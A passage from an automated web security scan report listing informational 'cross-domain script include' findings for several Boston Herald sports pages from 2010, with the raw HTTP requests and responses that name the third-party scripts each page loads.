http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.165. http://bostonherald.com/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:34:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.166. http://bostonherald.com/sports/football/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/nflministandings.aspx?id=077
http://www.sportsnetwork.com/aspdata/clients/herald/nflschedule.aspx?id=077
http://www.sportsnetwork.com/aspdata/clients/herald/nflteamleaders.aspx?id=077

Request

GET /sports/football/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflschedule.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflministandings.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflteamleaders.aspx?id=077"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.167. http://bostonherald.com/sports/football/other_nfl/view/20101107giants_overpower_seahawks_41-7/srvc=home&position=recent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/other_nfl/view/20101107giants_overpower_seahawks_41-7/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/other_nfl/view/20101107giants_overpower_seahawks_41-7/srvc=home&position=recent HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:27:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.168. http://bostonherald.com/sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:28:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.169. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.170. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.171. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.172. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 71939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.173. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
